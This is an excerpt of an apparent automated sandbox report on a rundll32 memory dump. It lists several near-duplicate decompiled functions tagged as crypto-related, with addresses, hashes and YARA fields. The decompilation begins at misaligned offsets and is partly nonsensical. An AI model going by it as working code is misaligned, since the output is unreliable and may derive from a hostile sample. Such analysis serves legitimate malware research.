                                        • Instruction Fuzzy Hash: C351F87371495107E76C8A69AC66BBE6A92D3C4388F44923DEF5797FCAC92CC612C340
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF304A7C2 Relevance: 1.4, Strings: 1, Instructions: 156COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 77%
                                        			E0000021E21EF304A7C2(void* __eax, void* __ebx, void* __edi, signed int __ebp, void* __eflags, long long __rax, void* __rbx, intOrPtr* __rcx, void* __rdi, void* __rsi, void* __rbp, void* __r9, long long _a32, void* _a48, void* _a56, signed int _a80, intOrPtr _a88, void* _a96) {
				signed char _t58;
				signed char _t59;
				void* _t65;
				signed char _t70;
				intOrPtr _t82;
				void* _t84;
				long long _t120;
				void* _t121;
				void* _t165;

				_t165 = __r9;
				_t121 = __rbx;
				_t120 = __rax;
				 *((intOrPtr*)(__rax)) =  *((intOrPtr*)(__rax)) + __eax;
				 *((intOrPtr*)(__rax - 0x15)) =  *((intOrPtr*)(__rax - 0x15)) + __eax;
				_t58 = __eax - 0xc88b83;
				 *((intOrPtr*)(__rax)) =  *((intOrPtr*)(__rax)) + _t58;
				_t59 = _t58 & 0x0000003d;
				 *__rcx =  *__rcx - _t59;
				 *((intOrPtr*)(__rax)) =  *((intOrPtr*)(__rax)) + _t59;
				if (__eflags == 0) goto 0xf304a7ed;
				if (_t59 != 0x38e) goto 0xf304a7f7;
				 *(__rbx + 0xc8) =  *(__rbx + 0xc8) | 0x00000100;
				goto 0xf304a7f7;
				 *(__rbx + 0xc8) =  *(__rbx + 0xc8) | 0x00000080;
				_a80 = _a80 + 1;
				if (_a80 - E0000021E21EF30290D0(_t59, __rdi) < 0) goto 0xf304a761;
				E0000021E21EF3029110(__rax, __rbx, __rdi, E0000021E21EF304C500, __rdi, __rbp);
				r9d = 0;
				r8d = 0;
				E0000021E21EF3091730(__rax, _t121);
				if (__rax == 0) goto 0xf304a85d;
				if ( *((intOrPtr*)(__rax)) - __ebp <= 0) goto 0xf304a848;
				 *(_t121 + 0xcc) =  *( *(__rax + 8)) & 0x000000ff;
				goto 0xf304a84e;
				 *(_t121 + 0xcc) = __ebp;
				 *(_t121 + 0xc0) =  *(_t121 + 0xc0) | 0x00000008;
				E0000021E21EF30749F0(__rax);
				r9d = 0;
				r8d = 0;
				E0000021E21EF3091730(_t120, _t121);
				r9d = 0;
				 *((long long*)(_t121 + 0xd0)) = _t120;
				r8d = 0;
				_t65 = E0000021E21EF3091730(_t120, _t121);
				 *((long long*)(_t121 + 0xd8)) = _t120;
				E0000021E21EF30480C0(E0000021E21EF3035740(_t65, _t121), _t121);
				if (E0000021E21EF3047B30(_t120, _t121, _t120, _t120) != 0) goto 0xf304a8e8;
				 *(_t121 + 0xc0) =  *(_t121 + 0xc0) | 0x00000020;
				if (E0000021E21EF3049EB0(_t120, _t121,  *((intOrPtr*)(_t121 + 0xd8)), __rsi) != 0) goto 0xf304a8e8;
				_t70 =  *(_t121 + 0xc0);
				if ((_t70 & 0x00000002) == 0) goto 0xf304a8de;
				if (( *(_t121 + 0xc4) & 0x00000004) == 0) goto 0xf304a8e8;
				asm("bts eax, 0xd");
				 *(_t121 + 0xc0) = _t70;
				r9d = 0;
				r8d = 0;
				E0000021E21EF3091730(_t120, _t121);
				r9d = 0;
				 *((long long*)(_t121 + 0xf0)) = _t120;
				E0000021E21EF3091730(_t120, _t121);
				 *((long long*)(_t121 + 0xf8)) = _t120;
				if (_t120 != 0) goto 0xf304a933;
				if (_a80 == 0xffffffff) goto 0xf304a933;
				 *(_t121 + 0xc0) =  *(_t121 + 0xc0) | 0x00000080;
				E0000021E21EF304A430(_a80 - 0xffffffff, _t120, _t121, _t121, _t120);
				r9d = 0;
				r8d = 0;
				E0000021E21EF3091730(_t120, _t121);
				r9d = 0;
				 *((long long*)(_t121 + 0x100)) = _t120;
				r8d = 0;
				E0000021E21EF3091730(_t120, _t121);
				 *((long long*)(_t121 + 0x108)) = _t120;
				_a80 = __ebp;
				if (_a80 - E0000021E21EF3091710(_t120, _t121) >= 0) goto 0xf304aa2e;
				E0000021E21EF30916D0(_t120, _t121);
				E0000021E21EF30AC080(_t120);
				if (E0000021E21EF3031F80(_t120, _t120) != 0x359) goto 0xf304a9c1;
				 *(_t121 + 0xc0) =  *(_t121 + 0xc0) | 0x00001000;
				if (E0000021E21EF3091750(_t120) == 0) goto 0xf304aa0a;
				E0000021E21EF30AC080(_t120);
				_t82 = E0000021E21EF3031F80(_t120, _t120);
				_a88 = _t82;
				if (_t82 == 0) goto 0xf304aa24;
				r9d = 4;
				_a32 = 0xf309af50;
				_t47 = _t165 + 0xa; // 0xa
				r8d = _t47;
				E0000021E21EF30319D0(_t120);
				if (_t120 == 0) goto 0xf304aa24;
				_a80 = _a80 + 1;
				_t84 = E0000021E21EF3091710(_t120, _t121);
				if (_a80 - _t84 < 0) goto 0xf304a993;
				goto 0xf304aa2e;
				 *(_t121 + 0xc0) =  *(_t121 + 0xc0) | 0x00000200;
				 *(_t121 + 0xc0) =  *(_t121 + 0xc0) | 0x00000100;
				return _t84;
			}












                                        0x21ef304a7c2
                                        0x21ef304a7c2
                                        0x21ef304a7c2
                                        0x21ef304a7c4
                                        0x21ef304a7c6
                                        0x21ef304a7c9
                                        0x21ef304a7ce
                                        0x21ef304a7d2
                                        0x21ef304a7d4
                                        0x21ef304a7d6
                                        0x21ef304a7d8
                                        0x21ef304a7df
                                        0x21ef304a7e1
                                        0x21ef304a7eb
                                        0x21ef304a7ed
                                        0x21ef304a7f7
                                        0x21ef304a809
                                        0x21ef304a819
                                        0x21ef304a81e
                                        0x21ef304a821
                                        0x21ef304a82b
                                        0x21ef304a833
                                        0x21ef304a837
                                        0x21ef304a840
                                        0x21ef304a846
                                        0x21ef304a848
                                        0x21ef304a84e
                                        0x21ef304a858
                                        0x21ef304a85d
                                        0x21ef304a860
                                        0x21ef304a86a
                                        0x21ef304a86f
                                        0x21ef304a872
                                        0x21ef304a879
                                        0x21ef304a883
                                        0x21ef304a88b
                                        0x21ef304a89d
                                        0x21ef304a8af
                                        0x21ef304a8bb
                                        0x21ef304a8c9
                                        0x21ef304a8cb
                                        0x21ef304a8d3
                                        0x21ef304a8dc
                                        0x21ef304a8de
                                        0x21ef304a8e2
                                        0x21ef304a8e8
                                        0x21ef304a8eb
                                        0x21ef304a8f5
                                        0x21ef304a8fa
                                        0x21ef304a8fd
                                        0x21ef304a911
                                        0x21ef304a916
                                        0x21ef304a920
                                        0x21ef304a927
                                        0x21ef304a929
                                        0x21ef304a936
                                        0x21ef304a93b
                                        0x21ef304a93e
                                        0x21ef304a949
                                        0x21ef304a94e
                                        0x21ef304a951
                                        0x21ef304a958
                                        0x21ef304a963
                                        0x21ef304a96b
                                        0x21ef304a972
                                        0x21ef304a986
                                        0x21ef304a998
                                        0x21ef304a9a3
                                        0x21ef304a9b5
                                        0x21ef304a9b7
                                        0x21ef304a9cb
                                        0x21ef304a9d0
                                        0x21ef304a9d8
                                        0x21ef304a9dd
                                        0x21ef304a9e3
                                        0x21ef304a9e5
                                        0x21ef304a9eb
                                        0x21ef304a9fc
                                        0x21ef304a9fc
                                        0x21ef304aa00
                                        0x21ef304aa08
                                        0x21ef304aa0a
                                        0x21ef304aa11
                                        0x21ef304aa1c
                                        0x21ef304aa22
                                        0x21ef304aa24
                                        0x21ef304aa2e
                                        0x21ef304aa47

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID: 0-3916222277
                                        • Opcode ID: faee3053493eed21173e01546e8c39f72b2ac5eb792b1d4fe10e4af215a08a51
                                        • Instruction ID: c38816466bb2c0eb9531f17dae44f26e1d6a1a86a2f38be7ed61ccfa7437ce9e
                                        • Opcode Fuzzy Hash: faee3053493eed21173e01546e8c39f72b2ac5eb792b1d4fe10e4af215a08a51
                                        • Instruction Fuzzy Hash: D961813220528186EF589B61ED29BEF77A1E7A1784F159037DE4547F86EA7CC902C710
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF304A7A7 Relevance: 1.4, Strings: 1, Instructions: 147COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 77%
                                        			E0000021E21EF304A7A7(void* __eax, void* __ebx, void* __edx, void* __edi, signed int __ebp, long long __rax, void* __rbx, intOrPtr* __rcx, void* __rdi, void* __rsi, signed int __rbp, void* __r9, long long _a32, void* _a48, void* _a56, signed int _a80, intOrPtr _a88, void* _a96) {
				signed char _t68;
				signed char _t69;
				void* _t75;
				signed char _t80;
				intOrPtr _t92;
				void* _t94;
				signed int _t116;
				long long _t134;
				void* _t135;
				void* _t179;

				_t179 = __r9;
				_t135 = __rbx;
				_t134 = __rax;
				 *((intOrPtr*)(__rax)) =  *((intOrPtr*)(__rax)) + __eax;
				 *((intOrPtr*)(__rbx + __rbp * 8)) =  *((intOrPtr*)(__rbx + __rbp * 8)) + __eax;
				 *(__rbx + 0xc8) =  *(__rbx + 0xc8) | 0x00000008;
				goto 0xf304a7f7;
				 *(__rbx + 0xc8) =  *(__rbx + 0xc8) | 0x00000010;
				 *((intOrPtr*)(__rax)) =  *((intOrPtr*)(__rax)) + __eax;
				 *((intOrPtr*)(__rax)) =  *((intOrPtr*)(__rax)) + __edx;
				goto 0xf304a7f7;
				_t9 = __rbx + 0xc8;
				 *_t9 =  *(__rbx + 0xc8) | 0x00000040;
				_t116 =  *_t9;
				 *((intOrPtr*)(__rax)) =  *((intOrPtr*)(__rax)) + __eax;
				 *((intOrPtr*)(__rax - 0x15)) =  *((intOrPtr*)(__rax - 0x15)) + __eax;
				_t68 = __eax - 0xc88b83;
				 *((intOrPtr*)(__rax)) =  *((intOrPtr*)(__rax)) + _t68;
				_t69 = _t68 & 0x0000003d;
				 *__rcx =  *__rcx - _t69;
				 *((intOrPtr*)(__rax)) =  *((intOrPtr*)(__rax)) + _t69;
				if (_t116 == 0) goto 0xf304a7ed;
				if (_t69 != 0x38e) goto 0xf304a7f7;
				 *(__rbx + 0xc8) =  *(__rbx + 0xc8) | 0x00000100;
				goto 0xf304a7f7;
				 *(__rbx + 0xc8) =  *(__rbx + 0xc8) | 0x00000080;
				_a80 = _a80 + 1;
				if (_a80 - E0000021E21EF30290D0(_t69, __rdi) < 0) goto 0xf304a761;
				E0000021E21EF3029110(__rax, __rbx, __rdi, E0000021E21EF304C500, __rdi, __rbp);
				r9d = 0;
				r8d = 0;
				E0000021E21EF3091730(__rax, _t135);
				if (__rax == 0) goto 0xf304a85d;
				if ( *((intOrPtr*)(__rax)) - __ebp <= 0) goto 0xf304a848;
				 *(_t135 + 0xcc) =  *( *(__rax + 8)) & 0x000000ff;
				goto 0xf304a84e;
				 *(_t135 + 0xcc) = __ebp;
				 *(_t135 + 0xc0) =  *(_t135 + 0xc0) | 0x00000008;
				E0000021E21EF30749F0(__rax);
				r9d = 0;
				r8d = 0;
				E0000021E21EF3091730(_t134, _t135);
				r9d = 0;
				 *((long long*)(_t135 + 0xd0)) = _t134;
				r8d = 0;
				_t75 = E0000021E21EF3091730(_t134, _t135);
				 *((long long*)(_t135 + 0xd8)) = _t134;
				E0000021E21EF30480C0(E0000021E21EF3035740(_t75, _t135), _t135);
				if (E0000021E21EF3047B30(_t134, _t135, _t134, _t134) != 0) goto 0xf304a8e8;
				 *(_t135 + 0xc0) =  *(_t135 + 0xc0) | 0x00000020;
				if (E0000021E21EF3049EB0(_t134, _t135,  *((intOrPtr*)(_t135 + 0xd8)), __rsi) != 0) goto 0xf304a8e8;
				_t80 =  *(_t135 + 0xc0);
				if ((_t80 & 0x00000002) == 0) goto 0xf304a8de;
				if (( *(_t135 + 0xc4) & 0x00000004) == 0) goto 0xf304a8e8;
				asm("bts eax, 0xd");
				 *(_t135 + 0xc0) = _t80;
				r9d = 0;
				r8d = 0;
				E0000021E21EF3091730(_t134, _t135);
				r9d = 0;
				 *((long long*)(_t135 + 0xf0)) = _t134;
				E0000021E21EF3091730(_t134, _t135);
				 *((long long*)(_t135 + 0xf8)) = _t134;
				if (_t134 != 0) goto 0xf304a933;
				if (_a80 == 0xffffffff) goto 0xf304a933;
				 *(_t135 + 0xc0) =  *(_t135 + 0xc0) | 0x00000080;
				E0000021E21EF304A430(_a80 - 0xffffffff, _t134, _t135, _t135, _t134);
				r9d = 0;
				r8d = 0;
				E0000021E21EF3091730(_t134, _t135);
				r9d = 0;
				 *((long long*)(_t135 + 0x100)) = _t134;
				r8d = 0;
				E0000021E21EF3091730(_t134, _t135);
				 *((long long*)(_t135 + 0x108)) = _t134;
				_a80 = __ebp;
				if (_a80 - E0000021E21EF3091710(_t134, _t135) >= 0) goto 0xf304aa2e;
				E0000021E21EF30916D0(_t134, _t135);
				E0000021E21EF30AC080(_t134);
				if (E0000021E21EF3031F80(_t134, _t134) != 0x359) goto 0xf304a9c1;
				 *(_t135 + 0xc0) =  *(_t135 + 0xc0) | 0x00001000;
				if (E0000021E21EF3091750(_t134) == 0) goto 0xf304aa0a;
				E0000021E21EF30AC080(_t134);
				_t92 = E0000021E21EF3031F80(_t134, _t134);
				_a88 = _t92;
				if (_t92 == 0) goto 0xf304aa24;
				r9d = 4;
				_a32 = 0xf309af50;
				_t57 = _t179 + 0xa; // 0xa
				r8d = _t57;
				E0000021E21EF30319D0(_t134);
				if (_t134 == 0) goto 0xf304aa24;
				_a80 = _a80 + 1;
				_t94 = E0000021E21EF3091710(_t134, _t135);
				if (_a80 - _t94 < 0) goto 0xf304a993;
				goto 0xf304aa2e;
				 *(_t135 + 0xc0) =  *(_t135 + 0xc0) | 0x00000200;
				 *(_t135 + 0xc0) =  *(_t135 + 0xc0) | 0x00000100;
				return _t94;
			}













                                        0x21ef304a7a7
                                        0x21ef304a7a7
                                        0x21ef304a7a7
                                        0x21ef304a7a9
                                        0x21ef304a7ab
                                        0x21ef304a7ae
                                        0x21ef304a7b6
                                        0x21ef304a7b8
                                        0x21ef304a7bb
                                        0x21ef304a7bd
                                        0x21ef304a7bf
                                        0x21ef304a7c1
                                        0x21ef304a7c1
                                        0x21ef304a7c1
                                        0x21ef304a7c4
                                        0x21ef304a7c6
                                        0x21ef304a7c9
                                        0x21ef304a7ce
                                        0x21ef304a7d2
                                        0x21ef304a7d4
                                        0x21ef304a7d6
                                        0x21ef304a7d8
                                        0x21ef304a7df
                                        0x21ef304a7e1
                                        0x21ef304a7eb
                                        0x21ef304a7ed
                                        0x21ef304a7f7
                                        0x21ef304a809
                                        0x21ef304a819
                                        0x21ef304a81e
                                        0x21ef304a821
                                        0x21ef304a82b
                                        0x21ef304a833
                                        0x21ef304a837
                                        0x21ef304a840
                                        0x21ef304a846
                                        0x21ef304a848
                                        0x21ef304a84e
                                        0x21ef304a858
                                        0x21ef304a85d
                                        0x21ef304a860
                                        0x21ef304a86a
                                        0x21ef304a86f
                                        0x21ef304a872
                                        0x21ef304a879
                                        0x21ef304a883
                                        0x21ef304a88b
                                        0x21ef304a89d
                                        0x21ef304a8af
                                        0x21ef304a8bb
                                        0x21ef304a8c9
                                        0x21ef304a8cb
                                        0x21ef304a8d3
                                        0x21ef304a8dc
                                        0x21ef304a8de
                                        0x21ef304a8e2
                                        0x21ef304a8e8
                                        0x21ef304a8eb
                                        0x21ef304a8f5
                                        0x21ef304a8fa
                                        0x21ef304a8fd
                                        0x21ef304a911
                                        0x21ef304a916
                                        0x21ef304a920
                                        0x21ef304a927
                                        0x21ef304a929
                                        0x21ef304a936
                                        0x21ef304a93b
                                        0x21ef304a93e
                                        0x21ef304a949
                                        0x21ef304a94e
                                        0x21ef304a951
                                        0x21ef304a958
                                        0x21ef304a963
                                        0x21ef304a96b
                                        0x21ef304a972
                                        0x21ef304a986
                                        0x21ef304a998
                                        0x21ef304a9a3
                                        0x21ef304a9b5
                                        0x21ef304a9b7
                                        0x21ef304a9cb
                                        0x21ef304a9d0
                                        0x21ef304a9d8
                                        0x21ef304a9dd
                                        0x21ef304a9e3
                                        0x21ef304a9e5
                                        0x21ef304a9eb
                                        0x21ef304a9fc
                                        0x21ef304a9fc
                                        0x21ef304aa00
                                        0x21ef304aa08
                                        0x21ef304aa0a
                                        0x21ef304aa11
                                        0x21ef304aa1c
                                        0x21ef304aa22
                                        0x21ef304aa24
                                        0x21ef304aa2e
                                        0x21ef304aa47

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID: 0-3916222277
                                        • Opcode ID: f98d0d10f6ba1c480b1e17fe1dbdc1d73ead3945fe49c251a8d8674fd3338632
                                        • Instruction ID: 020bda0c2352d5726d025d26b4ad99336c7e376ebd9ed3419b0844ee4da7fdb7
                                        • Opcode Fuzzy Hash: f98d0d10f6ba1c480b1e17fe1dbdc1d73ead3945fe49c251a8d8674fd3338632
                                        • Instruction Fuzzy Hash: FE519F3220528186EF589B21ED29BEF73A1E7A1784F169136DE4647F86EB7CC902C710
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF304A795 Relevance: 1.4, Strings: 1, Instructions: 146COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 77%
                                        			E0000021E21EF304A795(void* __eax, void* __ebx, void* __edx, void* __edi, signed int __ebp, long long __rax, void* __rbx, intOrPtr* __rcx, intOrPtr* __rdx, void* __rdi, void* __rsi, signed int __rbp, void* __r9, long long _a32, void* _a48, void* _a56, signed int _a80, intOrPtr _a88, void* _a96) {
				signed char _t72;
				signed char _t73;
				void* _t79;
				signed char _t84;
				intOrPtr _t96;
				void* _t98;
				signed int _t124;
				long long _t142;
				void* _t143;
				void* _t188;

				_t188 = __r9;
				_t143 = __rbx;
				_t142 = __rax;
				 *((intOrPtr*)(__rax)) =  *((intOrPtr*)(__rax)) + __eax;
				 *__rcx =  *__rcx + __eax;
				goto 0xf304a7f7;
				 *(__rbx + 0xc8) =  *(__rbx + 0xc8) | 0x00000002;
				 *((intOrPtr*)(__rax)) =  *((intOrPtr*)(__rax)) + __eax;
				 *__rdx =  *__rdx + __eax;
				goto 0xf304a7f7;
				 *(__rbx + 0xc8) =  *(__rbx + 0xc8) | 0x00000004;
				 *((intOrPtr*)(__rax)) =  *((intOrPtr*)(__rax)) + __eax;
				 *((intOrPtr*)(__rbx + __rbp * 8)) =  *((intOrPtr*)(__rbx + __rbp * 8)) + __eax;
				 *(__rbx + 0xc8) =  *(__rbx + 0xc8) | 0x00000008;
				goto 0xf304a7f7;
				 *(__rbx + 0xc8) =  *(__rbx + 0xc8) | 0x00000010;
				 *((intOrPtr*)(__rax)) =  *((intOrPtr*)(__rax)) + __eax;
				 *((intOrPtr*)(__rax)) =  *((intOrPtr*)(__rax)) + __edx;
				goto 0xf304a7f7;
				_t13 = __rbx + 0xc8;
				 *_t13 =  *(__rbx + 0xc8) | 0x00000040;
				_t124 =  *_t13;
				 *((intOrPtr*)(__rax)) =  *((intOrPtr*)(__rax)) + __eax;
				 *((intOrPtr*)(__rax - 0x15)) =  *((intOrPtr*)(__rax - 0x15)) + __eax;
				_t72 = __eax - 0xc88b83;
				 *((intOrPtr*)(__rax)) =  *((intOrPtr*)(__rax)) + _t72;
				_t73 = _t72 & 0x0000003d;
				 *__rcx =  *__rcx - _t73;
				 *((intOrPtr*)(__rax)) =  *((intOrPtr*)(__rax)) + _t73;
				if (_t124 == 0) goto 0xf304a7ed;
				if (_t73 != 0x38e) goto 0xf304a7f7;
				 *(__rbx + 0xc8) =  *(__rbx + 0xc8) | 0x00000100;
				goto 0xf304a7f7;
				 *(__rbx + 0xc8) =  *(__rbx + 0xc8) | 0x00000080;
				_a80 = _a80 + 1;
				if (_a80 - E0000021E21EF30290D0(_t73, __rdi) < 0) goto 0xf304a761;
				E0000021E21EF3029110(__rax, __rbx, __rdi, E0000021E21EF304C500, __rdi, __rbp);
				r9d = 0;
				r8d = 0;
				E0000021E21EF3091730(__rax, _t143);
				if (__rax == 0) goto 0xf304a85d;
				if ( *((intOrPtr*)(__rax)) - __ebp <= 0) goto 0xf304a848;
				 *(_t143 + 0xcc) =  *( *(__rax + 8)) & 0x000000ff;
				goto 0xf304a84e;
				 *(_t143 + 0xcc) = __ebp;
				 *(_t143 + 0xc0) =  *(_t143 + 0xc0) | 0x00000008;
				E0000021E21EF30749F0(__rax);
				r9d = 0;
				r8d = 0;
				E0000021E21EF3091730(_t142, _t143);
				r9d = 0;
				 *((long long*)(_t143 + 0xd0)) = _t142;
				r8d = 0;
				_t79 = E0000021E21EF3091730(_t142, _t143);
				 *((long long*)(_t143 + 0xd8)) = _t142;
				E0000021E21EF30480C0(E0000021E21EF3035740(_t79, _t143), _t143);
				if (E0000021E21EF3047B30(_t142, _t143, _t142, _t142) != 0) goto 0xf304a8e8;
				 *(_t143 + 0xc0) =  *(_t143 + 0xc0) | 0x00000020;
				if (E0000021E21EF3049EB0(_t142, _t143,  *((intOrPtr*)(_t143 + 0xd8)), __rsi) != 0) goto 0xf304a8e8;
				_t84 =  *(_t143 + 0xc0);
				if ((_t84 & 0x00000002) == 0) goto 0xf304a8de;
				if (( *(_t143 + 0xc4) & 0x00000004) == 0) goto 0xf304a8e8;
				asm("bts eax, 0xd");
				 *(_t143 + 0xc0) = _t84;
				r9d = 0;
				r8d = 0;
				E0000021E21EF3091730(_t142, _t143);
				r9d = 0;
				 *((long long*)(_t143 + 0xf0)) = _t142;
				E0000021E21EF3091730(_t142, _t143);
				 *((long long*)(_t143 + 0xf8)) = _t142;
				if (_t142 != 0) goto 0xf304a933;
				if (_a80 == 0xffffffff) goto 0xf304a933;
				 *(_t143 + 0xc0) =  *(_t143 + 0xc0) | 0x00000080;
				E0000021E21EF304A430(_a80 - 0xffffffff, _t142, _t143, _t143, _t142);
				r9d = 0;
				r8d = 0;
				E0000021E21EF3091730(_t142, _t143);
				r9d = 0;
				 *((long long*)(_t143 + 0x100)) = _t142;
				r8d = 0;
				E0000021E21EF3091730(_t142, _t143);
				 *((long long*)(_t143 + 0x108)) = _t142;
				_a80 = __ebp;
				if (_a80 - E0000021E21EF3091710(_t142, _t143) >= 0) goto 0xf304aa2e;
				E0000021E21EF30916D0(_t142, _t143);
				E0000021E21EF30AC080(_t142);
				if (E0000021E21EF3031F80(_t142, _t142) != 0x359) goto 0xf304a9c1;
				 *(_t143 + 0xc0) =  *(_t143 + 0xc0) | 0x00001000;
				if (E0000021E21EF3091750(_t142) == 0) goto 0xf304aa0a;
				E0000021E21EF30AC080(_t142);
				_t96 = E0000021E21EF3031F80(_t142, _t142);
				_a88 = _t96;
				if (_t96 == 0) goto 0xf304aa24;
				r9d = 4;
				_a32 = 0xf309af50;
				_t61 = _t188 + 0xa; // 0xa
				r8d = _t61;
				E0000021E21EF30319D0(_t142);
				if (_t142 == 0) goto 0xf304aa24;
				_a80 = _a80 + 1;
				_t98 = E0000021E21EF3091710(_t142, _t143);
				if (_a80 - _t98 < 0) goto 0xf304a993;
				goto 0xf304aa2e;
				 *(_t143 + 0xc0) =  *(_t143 + 0xc0) | 0x00000200;
				 *(_t143 + 0xc0) =  *(_t143 + 0xc0) | 0x00000100;
				return _t98;
			}













                                        0x21ef304a795
                                        0x21ef304a795
                                        0x21ef304a795
                                        0x21ef304a797
                                        0x21ef304a799
                                        0x21ef304a79b
                                        0x21ef304a79d
                                        0x21ef304a7a0
                                        0x21ef304a7a2
                                        0x21ef304a7a4
                                        0x21ef304a7a6
                                        0x21ef304a7a9
                                        0x21ef304a7ab
                                        0x21ef304a7ae
                                        0x21ef304a7b6
                                        0x21ef304a7b8
                                        0x21ef304a7bb
                                        0x21ef304a7bd
                                        0x21ef304a7bf
                                        0x21ef304a7c1
                                        0x21ef304a7c1
                                        0x21ef304a7c1
                                        0x21ef304a7c4
                                        0x21ef304a7c6
                                        0x21ef304a7c9
                                        0x21ef304a7ce
                                        0x21ef304a7d2
                                        0x21ef304a7d4
                                        0x21ef304a7d6
                                        0x21ef304a7d8
                                        0x21ef304a7df
                                        0x21ef304a7e1
                                        0x21ef304a7eb
                                        0x21ef304a7ed
                                        0x21ef304a7f7
                                        0x21ef304a809
                                        0x21ef304a819
                                        0x21ef304a81e
                                        0x21ef304a821
                                        0x21ef304a82b
                                        0x21ef304a833
                                        0x21ef304a837
                                        0x21ef304a840
                                        0x21ef304a846
                                        0x21ef304a848
                                        0x21ef304a84e
                                        0x21ef304a858
                                        0x21ef304a85d
                                        0x21ef304a860
                                        0x21ef304a86a
                                        0x21ef304a86f
                                        0x21ef304a872
                                        0x21ef304a879
                                        0x21ef304a883
                                        0x21ef304a88b
                                        0x21ef304a89d
                                        0x21ef304a8af
                                        0x21ef304a8bb
                                        0x21ef304a8c9
                                        0x21ef304a8cb
                                        0x21ef304a8d3
                                        0x21ef304a8dc
                                        0x21ef304a8de
                                        0x21ef304a8e2
                                        0x21ef304a8e8
                                        0x21ef304a8eb
                                        0x21ef304a8f5
                                        0x21ef304a8fa
                                        0x21ef304a8fd
                                        0x21ef304a911
                                        0x21ef304a916
                                        0x21ef304a920
                                        0x21ef304a927
                                        0x21ef304a929
                                        0x21ef304a936
                                        0x21ef304a93b
                                        0x21ef304a93e
                                        0x21ef304a949
                                        0x21ef304a94e
                                        0x21ef304a951
                                        0x21ef304a958
                                        0x21ef304a963
                                        0x21ef304a96b
                                        0x21ef304a972
                                        0x21ef304a986
                                        0x21ef304a998
                                        0x21ef304a9a3
                                        0x21ef304a9b5
                                        0x21ef304a9b7
                                        0x21ef304a9cb
                                        0x21ef304a9d0
                                        0x21ef304a9d8
                                        0x21ef304a9dd
                                        0x21ef304a9e3
                                        0x21ef304a9e5
                                        0x21ef304a9eb
                                        0x21ef304a9fc
                                        0x21ef304a9fc
                                        0x21ef304aa00
                                        0x21ef304aa08
                                        0x21ef304aa0a
                                        0x21ef304aa11
                                        0x21ef304aa1c
                                        0x21ef304aa22
                                        0x21ef304aa24
                                        0x21ef304aa2e
                                        0x21ef304aa47

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID: 0-3916222277
                                        • Opcode ID: 5d5e11c77c2c419bd1ccf9e43de01aa5263bff53a9bd12fb9758ac9a590358e5
                                        • Instruction ID: 6111bf94eca1fcdacf68c7f0be482fc60abd99a39632c02652483f168591c4e5
                                        • Opcode Fuzzy Hash: 5d5e11c77c2c419bd1ccf9e43de01aa5263bff53a9bd12fb9758ac9a590358e5
                                        • Instruction Fuzzy Hash: 7251603230528186EF589B61ED29BEF77A1E7A1784F169036DE4647F86EB7CC902C710
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF304A79E Relevance: 1.4, Strings: 1, Instructions: 146COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 77%
                                        			E0000021E21EF304A79E(void* __eax, void* __ebx, void* __edx, void* __edi, signed int __ebp, long long __rax, void* __rbx, intOrPtr* __rcx, intOrPtr* __rdx, void* __rdi, void* __rsi, signed int __rbp, void* __r9, long long _a32, void* _a48, void* _a56, signed int _a80, intOrPtr _a88, void* _a96) {
				signed char _t70;
				signed char _t71;
				void* _t77;
				signed char _t82;
				intOrPtr _t94;
				void* _t96;
				signed int _t120;
				long long _t138;
				void* _t139;
				void* _t184;

				_t184 = __r9;
				_t139 = __rbx;
				_t138 = __rax;
				 *((intOrPtr*)(__rax)) =  *((intOrPtr*)(__rax)) + __eax;
				 *__rdx =  *__rdx + __eax;
				goto 0xf304a7f7;
				 *(__rbx + 0xc8) =  *(__rbx + 0xc8) | 0x00000004;
				 *((intOrPtr*)(__rax)) =  *((intOrPtr*)(__rax)) + __eax;
				 *((intOrPtr*)(__rbx + __rbp * 8)) =  *((intOrPtr*)(__rbx + __rbp * 8)) + __eax;
				 *(__rbx + 0xc8) =  *(__rbx + 0xc8) | 0x00000008;
				goto 0xf304a7f7;
				 *(__rbx + 0xc8) =  *(__rbx + 0xc8) | 0x00000010;
				 *((intOrPtr*)(__rax)) =  *((intOrPtr*)(__rax)) + __eax;
				 *((intOrPtr*)(__rax)) =  *((intOrPtr*)(__rax)) + __edx;
				goto 0xf304a7f7;
				_t11 = __rbx + 0xc8;
				 *_t11 =  *(__rbx + 0xc8) | 0x00000040;
				_t120 =  *_t11;
				 *((intOrPtr*)(__rax)) =  *((intOrPtr*)(__rax)) + __eax;
				 *((intOrPtr*)(__rax - 0x15)) =  *((intOrPtr*)(__rax - 0x15)) + __eax;
				_t70 = __eax - 0xc88b83;
				 *((intOrPtr*)(__rax)) =  *((intOrPtr*)(__rax)) + _t70;
				_t71 = _t70 & 0x0000003d;
				 *__rcx =  *__rcx - _t71;
				 *((intOrPtr*)(__rax)) =  *((intOrPtr*)(__rax)) + _t71;
				if (_t120 == 0) goto 0xf304a7ed;
				if (_t71 != 0x38e) goto 0xf304a7f7;
				 *(__rbx + 0xc8) =  *(__rbx + 0xc8) | 0x00000100;
				goto 0xf304a7f7;
